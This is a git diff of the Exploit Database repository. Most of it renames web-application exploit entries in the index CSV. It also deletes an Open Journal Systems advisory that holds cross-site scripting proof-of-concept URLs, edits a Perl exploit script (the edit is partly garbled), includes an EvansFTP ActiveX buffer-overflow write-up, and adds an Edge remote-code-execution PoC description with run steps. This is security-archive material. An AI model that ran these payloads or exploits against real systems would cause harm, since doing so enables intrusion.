Injection",2010-12-25,NOCKAR1111,php,webapps,0 @@ -24563,7 +24563,7 @@ id,file,description,date,author,platform,type,port 16959,platforms/multiple/webapps/16959.txt,"Oracle WebLogic - Session Fixation Via HTTP POST",2011-03-11,"Roberto Suggi Liverani",multiple,webapps,0 16961,platforms/php/webapps/16961.py,"N_CMS 1.1E - Unauthenticated Local File Inclusion / Remote Code Exploit",2011-03-11,TecR0c,php,webapps,0 16962,platforms/asp/webapps/16962.txt,"SmarterStats 6.0 - Multiple Vulnerabilities",2011-03-11,"Hoyt LLC Research",asp,webapps,0 -16963,platforms/php/webapps/16963.txt,"Constructr CMS 3.03 - MultipleRemote Vulnerabilities",2011-03-11,LiquidWorm,php,webapps,0 +16963,platforms/php/webapps/16963.txt,"Constructr CMS 3.03 - Multiple Remote Vulnerabilities",2011-03-11,LiquidWorm,php,webapps,0 16968,platforms/php/webapps/16968.txt,"Cover Vision - SQL Injection",2011-03-13,Egyptian.H4x0rz,php,webapps,0 16969,platforms/php/webapps/16969.txt,"Log1 CMS 2.0 - Multiple Vulnerabilities",2011-03-14,Aodrulez,php,webapps,0 16975,platforms/asp/webapps/16975.txt,"SmarterMail 8.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-14,"Hoyt LLC Research",asp,webapps,0 @@ -24706,7 +24706,7 @@ id,file,description,date,author,platform,type,port 17296,platforms/php/webapps/17296.txt,"NoticeBoardPro 1.0 - Multiple Vulnerabilities",2011-05-16,"AutoSec Tools",php,webapps,0 17297,platforms/php/webapps/17297.txt,"Jcow 4.2.1 - Local File Inclusion",2011-05-16,"AutoSec Tools",php,webapps,0 17299,platforms/php/webapps/17299.txt,"WordPress Plugin Is-human 1.4.2 - Remote Command Execution",2011-05-17,neworder,php,webapps,0 -17301,platforms/php/webapps/17301.txt,"Pligg 1.1.4 - SQL Injection",2011-05-17,Null-0x00,php,webapps,0 +17301,platforms/php/webapps/17301.txt,"Pligg CMS 1.1.4 - SQL Injection",2011-05-17,Null-0x00,php,webapps,0 17303,platforms/php/webapps/17303.txt,"Joomla! Component 'com_jdownloads' 1.0 - Arbitrary File Upload",2011-05-18,Al-Ghamdi,php,webapps,0 17307,platforms/php/webapps/17307.txt,"Ultimate PHP Board 2.2.7 - Broken Authentication and Session Management",2011-05-20,i2sec,php,webapps,0 17308,platforms/php/webapps/17308.txt,"Zen Cart 1.3.9h - Multiple Vulnerabilities",2011-05-20,"Dr. Alberto Fontanella",php,webapps,0 @@ -25043,11 +25043,11 @@ id,file,description,date,author,platform,type,port 18013,platforms/windows/webapps/18013.py,"Cyclope Internet Filtering Proxy 4.0 - Persistent Cross-Site Scripting",2011-10-20,loneferret,windows,webapps,0 18018,platforms/php/webapps/18018.php,"SportsPHool 1.0 - Remote File Inclusion",2011-10-21,cr4wl3r,php,webapps,0 18020,platforms/php/webapps/18020.txt,"Jara 1.6 - SQL Injection",2011-10-23,muuratsalo,php,webapps,0 -18021,platforms/php/webapps/18021.php,"phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (1)",2011-10-23,EgiX,php,webapps,0 +18021,platforms/php/webapps/18021.php,"phpLDAPadmin 1.2.1.1 - Remote PHP Code Injection (1)",2011-10-23,EgiX,php,webapps,0 18022,platforms/php/webapps/18022.txt,"InverseFlow 2.4 - Cross-Site Request Forgery (Add Admin)",2011-10-23,"EjRaM HaCkEr",php,webapps,0 18042,platforms/php/webapps/18042.txt,"Joomla! Component Techfolio 1.0 - SQL Injection",2011-10-28,"Chris Russell",php,webapps,0 18046,platforms/php/webapps/18046.txt,"Joomla! Component Barter Sites 1.3 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 -18031,platforms/php/webapps/18031.rb,"phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (Metasploit) (2)",2011-10-25,Metasploit,php,webapps,0 +18031,platforms/php/webapps/18031.rb,"phpLDAPadmin 1.2.1.1 - Remote PHP Code Injection (Metasploit) (2)",2011-10-25,Metasploit,php,webapps,0 18032,platforms/windows/webapps/18032.rb,"SAP Management Console - OSExecute Payload Execution (Metasploit)",2011-10-24,Metasploit,windows,webapps,0 18035,platforms/php/webapps/18035.txt,"Online Subtitles Workshop - Cross-Site Scripting",2011-10-26,M.Jock3R,php,webapps,0 18036,platforms/php/webapps/18036.txt,"eFront 3.6.10 (build 11944) - Multiple Vulnerabilities",2011-10-27,EgiX,php,webapps,0 @@ -26192,8 +26192,8 @@ id,file,description,date,author,platform,type,port 22599,platforms/php/webapps/22599.html,"vBulletin 3.0 - Private Message HTML Injection",2003-05-14,"Ferruh Mavituna",php,webapps,0 22600,platforms/php/webapps/22600.txt,"Owl Intranet Engine 0.7 - Authentication Bypass",2003-05-14,cdowns,php,webapps,0 22603,platforms/php/webapps/22603.txt,"PHP-Proxima - autohtml.php Information Disclosure",2003-05-14,"Mind Warper",php,webapps,0 -22605,platforms/php/webapps/22605.txt,"OneOrZero Helpdesk 1.4 - TUpdate.php SQL Injection",2003-05-15,frog,php,webapps,0 -22606,platforms/php/webapps/22606.py,"OneOrZero Helpdesk 1.4 - install.php Administrative Access",2003-05-15,frog,php,webapps,0 +22605,platforms/php/webapps/22605.txt,"OneOrZero Helpdesk 1.4 - 'TUpdate.php' SQL Injection",2003-05-15,frog,php,webapps,0 +22606,platforms/php/webapps/22606.py,"OneOrZero Helpdesk 1.4 - 'install.php' Administrative Access",2003-05-15,frog,php,webapps,0 22607,platforms/php/webapps/22607.txt,"EZ Publish 2.2 - 'index.php' IMG Tag Cross-Site Scripting",2003-05-16,"Ferruh Mavituna",php,webapps,0 22612,platforms/php/webapps/22612.txt,"ttCMS 2.2/2.3 - header.php Remote File Inclusion",2003-05-17,ScriptSlave@gmx.net,php,webapps,0 22618,platforms/php/webapps/22618.txt,"ttCMS 2.2/2.3 / ttForum 1.1 - 'index.php' Instant-Messages Preferences SQL Injection",2003-05-20,ScriptSlave@gmx.net,php,webapps,0 @@ -28091,7 +28091,7 @@ id,file,description,date,author,platform,type,port 26207,platforms/php/webapps/26207.txt,"Land Down Under 700/701/800/801 - list.php Multiple Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0 26208,platforms/php/webapps/26208.txt,"Autolinks 2.1 Pro - Al_initialize.php Remote File Inclusion",2005-08-29,4Degrees,php,webapps,0 26209,platforms/php/webapps/26209.txt,"PHP-Fusion 4.0/5.0/6.0 - BBCode URL Tag Script Injection",2005-08-29,slacker4ever_1,php,webapps,0 -26211,platforms/php/webapps/26211.txt,"phpLDAPadmin 0.9.6/0.9.7 - welcome.php custom_welcome_page Variable Arbitrary File Inclusion",2005-08-30,rgod,php,webapps,0 +26211,platforms/php/webapps/26211.txt,"phpLDAPadmin 0.9.6/0.9.7 - 'welcome.php' Arbitrary File Inclusion",2005-08-30,rgod,php,webapps,0 26212,platforms/php/webapps/26212.txt,"FlatNuke 2.5.6 - ID Parameter Directory Traversal",2005-08-31,rgod,php,webapps,0 26213,platforms/php/webapps/26213.txt,"LibrettoCMS 2.2.2 - Arbitrary File Upload",2013-06-14,"CWH Underground",php,webapps,0 26215,platforms/php/webapps/26215.txt,"FlatNuke 2.5.6 - USR Parameter Cross-Site Scripting",2005-08-31,rgod,php,webapps,0 @@ -29251,12 +29251,12 @@ id,file,description,date,author,platform,type,port 27711,platforms/php/webapps/27711.txt,"ThWboard 3.0 - 'index.php' Cross-Site Scripting",2006-04-20,"CrAzY CrAcKeR",php,webapps,0 27712,platforms/cgi/webapps/27712.txt,"Portal Pack 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-20,r0t,cgi,webapps,0 27713,platforms/php/webapps/27713.txt,"Manic Web MWGuest 2.1 - MWguest.php HTML Injection",2006-04-20,"Aliaksandr Hartsuyeu",php,webapps,0 -27717,platforms/php/webapps/27717.txt,"phpLDAPadmin 0.9.8 - compare_form.php dn Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 -27718,platforms/php/webapps/27718.txt,"phpLDAPadmin 0.9.8 - copy_form.php dn Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 -27719,platforms/php/webapps/27719.txt,"phpLDAPadmin 0.9.8 - rename_form.php dn Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 +27717,platforms/php/webapps/27717.txt,"phpLDAPadmin 0.9.8 - 'compare_form.php' Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 +27718,platforms/php/webapps/27718.txt,"phpLDAPadmin 0.9.8 - 'copy_form.php' Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 +27719,platforms/php/webapps/27719.txt,"phpLDAPadmin 0.9.8 - 'rename_form.php' Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 33404,platforms/php/webapps/33404.txt,"phpFaber CMS 1.3.36 - 'module.php' Cross-Site Scripting",2009-12-14,bi0,php,webapps,0 -27721,platforms/php/webapps/27721.txt,"phpLDAPadmin 0.9.8 - search.php scope Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 -27722,platforms/php/webapps/27722.txt,"phpLDAPadmin 0.9.8 - template_engine.php Multiple Parameter Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 +27721,platforms/php/webapps/27721.txt,"phpLDAPadmin 0.9.8 - 'search.php' Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 +27722,platforms/php/webapps/27722.txt,"phpLDAPadmin 0.9.8 - 'template_engine.php' Cross-Site Scripting",2006-04-21,r0t,php,webapps,0 27724,platforms/php/webapps/27724.txt,"Scry Gallery - Directory Traversal",2006-04-21,"Morocco Security Team",php,webapps,0 27725,platforms/php/webapps/27725.txt,"MKPortal 1.1 - Multiple Input Validation Vulnerabilities",2006-04-22,"Mustafa Can Bjorn IPEKCI",php,webapps,0 27726,platforms/php/webapps/27726.txt,"Simplog 0.9.3 - ImageList.php Cross-Site Scripting",2006-04-22,nukedx,php,webapps,0 @@ -30943,7 +30943,7 @@ id,file,description,date,author,platform,type,port 30084,platforms/php/webapps/30084.php,"WordPress Plugin page-flip-image-gallery - Arbitrary File Upload",2013-12-06,"Ashiyane Digital Security Team",php,webapps,0 30086,platforms/php/webapps/30086.txt,"BoastMachine 3.1 - 'index.php' Cross-Site Scripting",2007-05-25,newbinaryfile,php,webapps,0 30087,platforms/php/webapps/30087.txt,"Digirez 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2007-05-25,Linux_Drox,php,webapps,0 -30088,platforms/php/webapps/30088.txt,"Pligg 9.5 - Reset Forgotten Password Security Bypass",2007-05-25,"242th section",php,webapps,0 +30088,platforms/php/webapps/30088.txt,"Pligg CMS 9.5 - Reset Forgotten Password Security Bypass",2007-05-25,"242th section",php,webapps,0 30095,platforms/php/webapps/30095.txt,"DGNews 1.5.1/2.1 - news.php SQL Injection",2007-05-28,"Jesper Jurcenoks",php,webapps,0 30097,platforms/php/webapps/30097.txt,"UebiMiau 2.7.10 - demo/pop3/error.php selected_theme Parameter Cross-Site Scripting",2007-05-29,"Michal Majchrowicz",php,webapps,0 30098,platforms/php/webapps/30098.txt,"UebiMiau 2.7.10 - 'demo/pop3/error.php' Multiple Variable Full Path Disclosure",2007-05-29,"Michal Majchrowicz",php,webapps,0 @@ -31322,7 +31322,7 @@ id,file,description,date,author,platform,type,port 30774,platforms/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script - Cross-Site Scripting",2007-11-16,"Adrian Pastor",php,webapps,0 30775,platforms/asp/webapps/30775.txt,"JiRo's Banner System 2.0 - 'login.asp' Multiple SQL Injection",2007-11-17,"Aria-Security Team",asp,webapps,0 30777,platforms/cgi/webapps/30777.txt,"Citrix Netscaler 8.0 build 47.8 - Generic_API_Call.pl Cross-Site Scripting",2007-11-19,nnposter,cgi,webapps,0 -30778,platforms/asp/webapps/30778.txt,"Click&BaneX - Details.asp SQL Injection",2007-11-19,"Aria-Security Team",asp,webapps,0 +30778,platforms/asp/webapps/30778.txt,"Click&BaneX - 'Details.asp' SQL Injection",2007-11-19,"Aria-Security Team",asp,webapps,0 30975,platforms/cgi/webapps/30975.txt,"W3-mSQL - Error Page Cross-Site Scripting",2008-01-03,vivek_infosec,cgi,webapps,0 30976,platforms/php/webapps/30976.txt,"MyPHP Forum 3.0 - 'search.php' Multiple Unspecified SQL Injection",2008-01-03,The:Paradox,php,webapps,0 30977,platforms/php/webapps/30977.txt,"WordPress 2.2.3 - 'wp-admin/post.php' popuptitle Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 @@ -31919,7 +31919,7 @@ id,file,description,date,author,platform,type,port 31724,platforms/php/webapps/31724.txt,"Alumni 1.0.8/1.0.9 - 'index.php' year Parameter Cross-Site Scripting",2008-05-02,hadihadi,php,webapps,0 31725,platforms/php/webapps/31725.txt,"Zen Cart 2008 - 'index.php' keyword Parameter SQL Injection",2008-05-02,"Ivan Sanchez",php,webapps,0 31726,platforms/php/webapps/31726.txt,"Zen Cart 2008 - 'index.php' keyword Parameter Cross-Site Scripting",2008-05-02,"Ivan Sanchez",php,webapps,0 -31727,platforms/php/webapps/31727.txt,"ChiCoMaS 2.0.4 - 'index.php' Cross-Site Scripting",2008-05-02,"Hadi Kiamarsi",php,webapps,0 +31727,platforms/php/webapps/31727.txt,"Chicomas 2.0.4 - 'index.php' Cross-Site Scripting",2008-05-02,"Hadi Kiamarsi",php,webapps,0 31729,platforms/php/webapps/31729.pl,"SiteXS CMS 0.1.1 - 'upload.php' Arbitrary File Upload",2008-05-03,"Hadi Kiamarsi",php,webapps,0 31730,platforms/php/webapps/31730.txt,"GEDCOM_TO_MYSQL - PHP/prenom.php Multiple Parameter Cross-Site Scripting",2008-05-05,ZoRLu,php,webapps,0 31731,platforms/php/webapps/31731.txt,"GEDCOM_TO_MYSQL - PHP/index.php nom_branche Parameter Cross-Site Scripting",2008-05-05,ZoRLu,php,webapps,0 @@ -32194,7 +32194,7 @@ id,file,description,date,author,platform,type,port 32139,platforms/php/webapps/32139.txt,"freeForum 1.7 - 'acuparam' Parameter Cross-Site Scripting",2008-08-01,ahmadbady,php,webapps,0 32140,platforms/php/webapps/32140.txt,"PHP-Nuke Book Catalog Module 1.0 - 'catid' Parameter SQL Injection",2008-08-01,"H4ckCity Security Team",php,webapps,0 32141,platforms/php/webapps/32141.txt,"Homes 4 Sale - 'results.php' Cross-Site Scripting",2008-08-04,"Ghost Hacker",php,webapps,0 -32142,platforms/php/webapps/32142.php,"Pligg 9.9.5 - 'CAPTCHA' Registration Automation Security Bypass",2008-08-02,"Micheal Brooks",php,webapps,0 +32142,platforms/php/webapps/32142.php,"Pligg CMS 9.9.5 - 'CAPTCHA' Registration Automation Security Bypass",2008-08-02,"Micheal Brooks",php,webapps,0 32143,platforms/php/webapps/32143.txt,"Keld PHP-MySQL News Script 0.7.1 - 'login.php' SQL Injection",2008-08-04,crimsoN_Loyd9,php,webapps,0 32144,platforms/php/webapps/32144.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'day.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 32145,platforms/php/webapps/32145.txt,"Meeting Room Booking System (MRBS) 1.2.6 - 'week.php' Cross-Site Scripting",2008-08-04,sl4xUz,php,webapps,0 @@ -33270,7 +33270,7 @@ id,file,description,date,author,platform,type,port 34109,platforms/php/webapps/34109.html,"log1 CMS 2.0 - Session Handling Remote Security Bypass / Remote File Inclusion",2010-06-03,"High-Tech Bridge SA",php,webapps,0 34110,platforms/php/webapps/34110.txt,"PG Auto Pro - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0 34111,platforms/multiple/webapps/34111.txt,"GREEZLE - Global Real Estate Agent Login Multiple SQL Injection",2010-06-09,"L0rd CrusAd3r",multiple,webapps,0 -34339,platforms/php/webapps/34339.txt,"Pligg 1.0.4 - 'search.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 +34339,platforms/php/webapps/34339.txt,"Pligg CMS 1.0.4 - 'search.php' Cross-Site Scripting",2010-07-15,"High-Tech Bridge SA",php,webapps,0 34124,platforms/php/webapps/34124.txt,"WordPress Plugin WP BackupPlus - Database And Files Backup Download",2014-07-20,pSyCh0_3D,php,webapps,0 34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection (Metasploit)",2014-07-21,"Brandon Perry",linux,webapps,80 34127,platforms/php/webapps/34127.txt,"Arab Portal 2.2 - 'members.php' SQL Injection",2010-06-10,SwEET-DeViL,php,webapps,0 @@ -33281,7 +33281,7 @@ id,file,description,date,author,platform,type,port 34163,platforms/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,hardware,webapps,0 34165,platforms/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 (x64) - Persistent Cross-Site Scripting",2014-07-25,"Dolev Farhi",multiple,webapps,0 34166,platforms/php/webapps/34166.txt,"KubeSupport - 'lang' Parameter SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 -34168,platforms/php/webapps/34168.py,"Pligg 2.0.1 - Multiple Vulnerabilities",2014-07-25,BlackHawk,php,webapps,80 +34168,platforms/php/webapps/34168.py,"Pligg CMS 2.0.1 - Multiple Vulnerabilities",2014-07-25,BlackHawk,php,webapps,80 34169,platforms/php/webapps/34169.txt,"Moodle 2.7 - Persistent Cross-Site Scripting",2014-07-27,"Osanda Malith",php,webapps,0 34170,platforms/php/webapps/34170.txt,"ZeroCMS 1.0 - Persistent Cross-Site Scripting",2014-07-27,"Mayuresh Dani",php,webapps,0 34173,platforms/php/webapps/34173.txt,"DirPHP 1.0 - Local File Inclusion",2014-07-27,"black hat",php,webapps,0 @@ -35085,11 +35085,10 @@ id,file,description,date,author,platform,type,port 36992,platforms/php/webapps/36992.txt,"Wing FTP Server Admin 4.4.5 - Cross-Site Request Forgery (Add User)",2015-05-11,hyp3rlinx,php,webapps,0 36993,platforms/php/webapps/36993.txt,"SQLBuddy 1.3.3 - Directory Traversal",2015-05-11,hyp3rlinx,php,webapps,0 36997,platforms/php/webapps/36997.txt,"CMSimple 3.3 - 'index.php' Cross-Site Scripting",2012-03-21,"Stefan Schurtz",php,webapps,0 -36998,platforms/php/webapps/36998.txt,"Open Journal Systems (OJS) 2.3.6 - /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php Multiple Parameter Cross-Site Scripting",2012-03-21,"High-Tech Bridge",php,webapps,0 36999,platforms/php/webapps/36999.txt,"Open Journal Systems (OJS) 2.3.6 - 'index.php' authors[][url] Parameter Cross-Site Scripting",2012-03-21,"High-Tech Bridge",php,webapps,0 37000,platforms/php/webapps/37000.txt,"Open Journal Systems (OJS) 2.3.6 - /lib/pkp/classes/core/String.inc.php String::stripUnsafeHtml() Method Cross-Site Scripting",2012-03-21,"High-Tech Bridge",php,webapps,0 37001,platforms/php/webapps/37001.txt,"Open Journal Systems (OJS) 2.3.6 - Multiple Script Arbitrary File Upload",2012-03-21,"High-Tech Bridge",php,webapps,0 -37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 - /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php Multiple Function Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0 +37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 - 'rfiles.php' Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0 37003,platforms/php/webapps/37003.txt,"WordPress Plugin Booking Calendar Contact Form 1.0.2 - Multiple Vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0 37004,platforms/php/webapps/37004.txt,"PHPCollab 2.5 - (deletetopics.php) SQL Injection",2015-05-13,Wadeek,php,webapps,0 37008,platforms/php/webapps/37008.txt,"Event Calendar PHP - 'cal_year' Parameter Cross-Site Scripting",2012-03-24,3spi0n,php,webapps,0 @@ -35116,7 +35115,7 @@ id,file,description,date,author,platform,type,port 37031,platforms/java/webapps/37031.txt,"ManageEngine Firewall Analyzer 7.2 - fw/mindex.do url Parameter Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 37032,platforms/java/webapps/37032.txt,"ManageEngine Firewall Analyzer 7.2 - fw/syslogViewer.do port Parameter Cross-Site Scripting",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0 37033,platforms/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 - 'domain' Parameter Cross-Site Scripting",2012-04-02,"Dawid Golak",java,webapps,0 -37034,platforms/php/webapps/37034.txt,"FlatnuX CMS - controlcenter.php contents/Files Action dir Parameter Traversal Arbitrary File Access",2012-04-01,"Vulnerability Laboratory",php,webapps,0 +37034,platforms/php/webapps/37034.txt,"FlatnuX CMS - Traversal Arbitrary File Access",2012-04-01,"Vulnerability Laboratory",php,webapps,0 37035,platforms/php/webapps/37035.html,"FlatnuX CMS - Cross-Site Request Forgery (Add Admin)",2012-04-01,"Vulnerability Laboratory",php,webapps,0 37038,platforms/php/webapps/37038.txt,"osCMax 2.5 - admin/login.php 'Username' Parameter Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 37039,platforms/php/webapps/37039.txt,"osCMax 2.5 - admin/htaccess.php Multiple Parameter Cross-Site Scripting",2012-04-04,"High-Tech Bridge SA",php,webapps,0 @@ -36935,4 +36934,4 @@ id,file,description,date,author,platform,type,port 40979,platforms/php/webapps/40979.php,"Zend Framework / zend-mail < 2.4.11 - Remote Code Execution",2016-12-30,"Dawid Golunski",php,webapps,0 40982,platforms/hardware/webapps/40982.html,"Xfinity Gateway (Technicolor DPC3941T) - Cross-Site Request Forgery",2016-08-09,"Ayushman Dutta",hardware,webapps,0 40986,platforms/php/webapps/40986.py,"PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - (AIO) 'PwnScriptum' Remote Code Execution",2017-01-02,"Dawid Golunski",php,webapps,0 -40989,platforms/jsp/webapps/40989.txt,"Atlassian Confluence Jira 5.9.12 - Persistent Cross-Site Scripting",2017-01-04,"Jodson Santos",jsp,webapps,0 +40989,platforms/jsp/webapps/40989.txt,"Atlassian Confluence 5.9.12 - Persistent Cross-Site Scripting",2017-01-04,"Jodson Santos",jsp,webapps,0 diff --git a/platforms/php/webapps/36998.txt b/platforms/php/webapps/36998.txt deleted file mode 100755 index 897d58370..000000000 --- a/platforms/php/webapps/36998.txt +++ /dev/null @@ -1,15 +0,0 @@ -source: http://www.securityfocus.com/bid/52666/info - -Open Journal Systems is prone to following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input: - -1. An arbitrary-file-deletion vulnerability -2. A security vulnerability -3. An arbitrary-file-upload vulnerability -4. Multiple cross-site scripting vulnerabilities - -An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks. - -Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected. - -http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php?editor=z&callb ack=x;};};alert%2834%29;{{&lang=en -http://www.example.com/lib/pkp/lib/tinymce/jscripts/tiny_mce/plugin s/ibrowser/ibrowser.php?editor=%27%29;};};alert%2834%29;{{a=x%28%27&callback=iBrowser_callback&a mp;lang=en \ No newline at end of file diff --git a/platforms/php/webapps/6172.pl b/platforms/php/webapps/6172.pl index 0041d2d4f..bf030a0d4 100755 --- a/platforms/php/webapps/6172.pl +++ b/platforms/php/webapps/6172.pl @@ -111,10 +111,10 @@ else if ( $data->content =~ /(.*)<\/textarea>/is ) { $temp = $2; - $temp =~ s/>/>/ig; - $temp =~ s/<//>/ig; + $temp =~ s/ EvansFTP (EvansFTP.ocx) Remote Buffer Overflow PoC [+] Application : EvansFTP ActiveX
[+] CompanyName : Evans Programming
[+] Description : Multi-threaded asynchronus Active-X FTP Control
[+] Lib GUID : {DA3C77F4-8701-11D4-908B-00010268221D}
[+] Exploit : Remote BoF (PoC)
[+] Author : Bl@ckbe@rD // Blackbeard-sql{a.t}Hotmail{dot}fr

[+] Object Safety Report :
Report for Clsid: {7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD}
RegKey Safe for Script: Faux
RegKey Safe for Init: Faux
Implements IObjectSafety: Vrai
IDisp Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data

RegKey Safe for Script: Faux
RegkeySafe for Init: Faux
KillBitSet: Faux


The Proprieties (RemoteAddress,ProxyPrefix,ProxyName,Password,ProxyBypassList,LoginName,CurrentDirectory) suffers from Buffer Overflow when we pass long strings in fact :
1- RemoteAddress suffers from a BoF when we pass a string over 2068
2- ProxyPrefix suffers from a BoF when we pass a string over 1044
3- ProxyName suffers from a BoF when we pass a string over 1044
4- Password suffers from a BoF when we pass a string over 1044
5- ProxyBypassList suffers from a BoF when we pass a string over 1044
6- LoginName suffers from a BoF when we pass a string over 1044
7- CurrentDirectory suffers from a BoF when we pass a string over 1044

DisASM RemoteAddress Crash :
 7C809EEC MOV AL,[EDX] (KERNEL32.dll) 7C809ED4 TEST EDX,EDX 7C809ED6 JE 7C80C858 7C809EDC LEA EDI,[EDX+EAX-1] 7C809EE0 CMP EDI,EDX 7C809EE2 JB 7C80C858 7C809EE8 AND DWORD PTR [EBP-4],0 7C809EEC MOV AL,[EDX] <--- CRASH EBP+8 FEEEFEEE Stack Dump: 13FC18 A7 F3 01 66 EE FE EE FE 04 00 00 00 02 00 00 00




Brought to You by Bl@ckbe@rD
Peace xD \ No newline at end of file diff --git a/platforms/windows/remote/40990.txt b/platforms/windows/remote/40990.txt new file mode 100755 index 000000000..825751d77 --- /dev/null +++ b/platforms/windows/remote/40990.txt @@ -0,0 +1,20 @@ +Source: https://github.com/theori-io/chakra-2016-11 + +Proofs of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40990.zip + + +chakra.dll Info Leak + Type Confusion for RCE + +Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201) + +Tested on Windows 10 Edge (modern.ie stable). + +FillFromPrototypes_TypeConfusion.html: WinExec notepad.exe + +FillFromPrototypes_TypeConfusion_NoSC.html: 0xcc (INT 3) + +To run: + +Download exploit/FillFromPrototypes_TypeConfusion.html to a directory. +Serve the directory using a webserver (or python's simple HTTP server). +Browse with a victim IE to FillFromPrototypes_TypeConfusion.html. \ No newline at end of file